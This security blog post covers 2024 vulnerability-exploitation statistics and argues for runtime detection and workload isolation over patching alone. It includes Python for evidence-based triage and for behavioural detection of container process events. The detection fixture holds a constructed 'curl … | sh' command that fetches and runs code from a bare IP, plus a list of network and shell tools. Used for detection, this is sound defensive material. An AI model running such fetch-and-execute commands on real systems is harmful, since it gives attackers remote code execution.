The Growing Exploitation Challenge
According to VulnCheck, 2024 saw a significant surge in publicly reported vulnerability exploitations, with 768 CVEs confirmed as exploited in the wild - a 20% increase from the previous year. This uptick reflects not just growing threats, but also improved detection and reporting mechanisms across the security community.
The timing of these exploitations raises further concerns: 23.6% of Known Exploited Vulnerabilities (KEVs) were actively exploited on or before their CVE public disclosure date. For nearly a quarter of the CVEs exploited in 2024, then, organizations had zero warning before active exploitation began: no advisory to read, and nothing for a scanner to flag.
The Complexity of Modern Vulnerability Management
The challenge extends beyond just the volume and timing of exploitations. The research identified over 100 unique sources reporting vulnerability exploitations, including:
- Security companies like Check Point, Aqua Security, and Fortinet
- Government agencies such as the DOD, CISA, and NHS
- Non-profit organizations like Shadowserver
- Product companies including Microsoft, Google, and Apple
- Various social media and blog platforms
This dispersed reporting landscape makes it practically impossible for organizations to monitor and respond to all potential threats using traditional approaches. As the research notes, even the CISA KEV catalog, which many federal agencies rely upon, fails to capture numerous known exploited vulnerabilities.
If we can’t accurately track what we know about, just imagine what is left unknown.
A Paradigm Shift in Security Thinking
The traditional approach to vulnerability management increasingly appears inadequate for today's threat landscape. We need to move beyond the "whack-a-mole" approach of trying to patch every vulnerability as it appears.
Every bug is different, with a different risk profile. Some are bogus and some are severe, but at the end of the day our compliance engines treat them the same. A vuln is a vuln is a vuln.
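One way to make the gap between those scattered sources concrete is to merge whatever exploitation evidence you can collect into a scanner's findings and rank on that evidence rather than on severity alone. The Python below is an added example, not code from VulnCheck or Edera; every CVE identifier, date and feed entry in it is constructed for illustration and describes no real vulnerability, and the three feed shapes are assumed stand-ins for a KEV-style catalog, a vendor advisory and a blog post.

```python
"""Rank scanner findings by exploitation evidence, not by CVSS alone.

Added example. All CVE ids, dates and feed contents are constructed for
illustration and describe no real vulnerability.
"""
import re
from dataclasses import dataclass, field
from datetime import date
from typing import Iterable, Optional, Tuple

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}", re.IGNORECASE)
DATE_RE = re.compile(r"\b\d{4}-\d{2}-\d{2}\b")

Evidence = Tuple[str, date, str]  # (CVE id, date first seen exploited, source)


@dataclass
class Finding:
    cve: str
    cvss: float
    published: date                       # CVE public disclosure date
    evidence: set = field(default_factory=set)
    first_exploited: Optional[date] = None


def constructed_scan():
    """What a compliance engine hands us: ids and severities, nothing else."""
    return [
        Finding("CVE-0000-0001", 9.8, date(2024, 3, 1)),
        Finding("CVE-0000-0002", 5.3, date(2024, 5, 10)),
        Finding("CVE-0000-0003", 7.5, date(2024, 7, 20)),
        Finding("CVE-0000-0004", 9.1, date(2024, 9, 2)),
    ]


# Three constructed feeds in three different shapes (assumed formats).
KEV_STYLE = {"vulnerabilities": [{"cveID": "CVE-0000-0002", "dateAdded": "2024-05-12"}]}
VENDOR_ADVISORY = [("cve-0000-0003", "2024-07-15")]          # note the lower-case id
BLOG_POSTS = ["Seen CVE-0000-0003 and CVE-0000-0002 in honeypot logs on 2024-06-01"]


def from_kev(feed) -> Iterable[Evidence]:
    for item in feed["vulnerabilities"]:
        yield item["cveID"].upper(), date.fromisoformat(item["dateAdded"]), "kev"


def from_advisory(rows) -> Iterable[Evidence]:
    for cve, seen in rows:
        yield cve.upper(), date.fromisoformat(seen), "vendor"


def from_blog(posts) -> Iterable[Evidence]:
    """Unstructured text: pull out every id and the first date mentioned."""
    for post in posts:
        m = DATE_RE.search(post)
        if not m:
            continue
        seen = date.fromisoformat(m.group())
        for cve in CVE_RE.findall(post):
            yield cve.upper(), seen, "blog"


def merge(findings, *feeds):
    by_id = {f.cve: f for f in findings}
    for feed in feeds:
        for cve, seen, source in feed:
            f = by_id.get(cve)
            if f is None:
                continue                    # exploited somewhere, but not in our estate
            f.evidence.add(source)
            if f.first_exploited is None or seen < f.first_exploited:
                f.first_exploited = seen
    return findings


def zero_day(f: Finding) -> bool:
    """Exploited on or before public disclosure, i.e. no warning was possible."""
    return f.first_exploited is not None and f.first_exploited <= f.published


def prioritise(findings):
    # Evidence of exploitation outranks severity; pre-disclosure exploitation
    # outranks everything. CVSS only breaks ties.
    return sorted(findings, key=lambda f: (bool(f.evidence), zero_day(f), f.cvss), reverse=True)


def triage():
    return prioritise(merge(constructed_scan(), from_kev(KEV_STYLE),
                            from_advisory(VENDOR_ADVISORY), from_blog(BLOG_POSTS)))


def known_to(findings, source):
    """Which findings a single feed would have surfaced on its own."""
    return {f.cve for f in findings if source in f.evidence}


if __name__ == "__main__":
    for f in triage():
        print(f.cve, f.cvss, sorted(f.evidence), "zero-day" if zero_day(f) else "")
```

Run as a script, this puts the finding that was exploited before disclosure at the top even though two unexploited findings carry a higher CVSS, and the KEV-style feed on its own would have surfaced only one of the two exploited findings. Two caveats a practitioner should keep: identifiers must be normalised before matching (the advisory uses a lower-case id), and a date scraped from a blog is the date someone wrote about it, which is an upper bound on first exploitation, not the real thing.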
Instead of attempting the impossible goal of eliminating all vulnerabilities, organizations should focus on reducing the impact of the exploitations that will inevitably happen. This is particularly crucial in cloud-native environments, where containment and isolation have so far been difficult to achieve: containers on a node share one kernel, so once a single workload is compromised it is much easier for an attacker to move laterally or to execute "living off the land" techniques.
Looking Forward: Runtime Detection and Strong Isolation
The data suggests two critical areas of focus for modern security strategies:
- Runtime Detection and Response: Given that many vulnerabilities are exploited before public disclosure, organizations need robust runtime detection capabilities to identify and respond to threats in real time, rather than relying solely on vulnerability scanning and patching, which by definition cannot act on a bug nobody has published yet.
- Strong Isolation: As Edera emphasizes, building better foundations through strong isolation technologies can help contain threats even when vulnerabilities are successfully exploited. This approach acknowledges that vulnerabilities are inevitable, but if the blast radius is confined to the single exploited container their impact can be significantly limited, and techniques such as "living off the land" lose most of their effectiveness because there is nothing beyond that container to pivot to.
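As an added illustration of the runtime-detection point (example code written for this page, not an Edera or VulnCheck tool): the events below are constructed JSON lines in the shape a generic container sensor might emit for process executions, and the field names, the set of request-serving processes and the tool list are all assumptions. The rules reference no CVE; they flag behaviour an exploited web service exhibits whether or not the bug is public, and group the hits by container to show how far the blast radius reached.

```python
"""Behavioural detection over container exec events, independent of any CVE.

Added example with constructed input; sensor field names are assumptions.
"""
import json
import os
import re
from typing import Dict, List, Set

# Constructed process-execution events from one node, one JSON object per line.
EVENTS = """\
{"ts":"2024-09-02T10:00:01Z","container":"web-7f9c","parent":"java","exe":"/bin/sh","args":["sh","-c","curl http://198.51.100.7/x | sh"]}
{"ts":"2024-09-02T10:00:02Z","container":"web-7f9c","parent":"sh","exe":"/usr/bin/curl","args":["curl","http://198.51.100.7/x"]}
{"ts":"2024-09-02T10:00:05Z","container":"batch-1a2b","parent":"cron","exe":"/usr/bin/curl","args":["curl","https://updates.example.internal/manifest"]}
{"ts":"2024-09-02T10:00:09Z","container":"web-7f9c","parent":"java","exe":"/usr/bin/java","args":["java","-jar","app.jar"]}
"""

# Processes that serve requests and should never spawn tooling (assumed set).
SERVICE_PARENTS = {"java", "node", "nginx", "php-fpm", "gunicorn"}
# Built-in tools an attacker lives off the land with once they have code execution.
LOTL_TOOLS = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat", "python3", "perl"}
DOWNLOADERS = {"curl", "wget"}
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")


def rules_for(event: dict) -> List[str]:
    """Return the names of every rule the event trips (possibly none)."""
    child = os.path.basename(event["exe"])
    hits = []
    # A request-serving process spawning a shell or tool is the signature of
    # post-exploitation regardless of which bug got the attacker there.
    if event["parent"] in SERVICE_PARENTS and child in LOTL_TOOLS:
        hits.append("service_spawned_tool")
    # Stagers are usually fetched from a raw IP rather than a named host.
    if child in DOWNLOADERS and any(BARE_IP_URL.search(a) for a in event["args"]):
        hits.append("download_from_bare_ip")
    return hits


def detect(jsonl: str) -> List[Dict[str, str]]:
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        for rule in rules_for(event):
            alerts.append({"ts": event["ts"], "container": event["container"],
                           "rule": rule, "exe": event["exe"]})
    return alerts


def affected_containers(alerts) -> Set[str]:
    """The blast radius as the sensor sees it: every container that alerted."""
    return {a["container"] for a in alerts}


if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(a["ts"], a["container"], a["rule"], a["exe"])
    print("containers to contain:", sorted(affected_containers(found)))
```

Neither rule knows which vulnerability put the attacker inside web-7f9c; they only see what the process did next, which is what makes runtime detection useful when disclosure arrives after exploitation. The cron job fetching from a named internal host does not alert, and the affected set stays at the one container that did, which is the outcome strong isolation is meant to guarantee rather than merely observe.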
Looking ahead, these challenges are likely to intensify. The increasing adoption of AI-powered coding assistants, accelerated (and messy) vulnerability identification and reporting, and the continued year-over-year growth in vulnerability disclosures all point to an even more complex security landscape in 2025.
Success in this environment will require a shift in how we think about security. With nearly a quarter of exploited vulnerabilities being attacked before they are even disclosed, the traditional "patch first" mindset is demonstrably insufficient. Organizations must accept that vulnerabilities are an inherent part of any system and instead focus on building resilient architectures that can contain and neutralize threats when, not if, they occur. We have to build better foundations, not wallow in the sadness of what we currently have. The future of security lies not in faster patching alone, but in creating systems that remain resistant to compromise even in the face of unknown vulnerabilities.
This evolution in security thinking - from vulnerability patching-only to containment and resilience - may well be the key to managing the growing complexity of the vulnerability landscape in the years to come.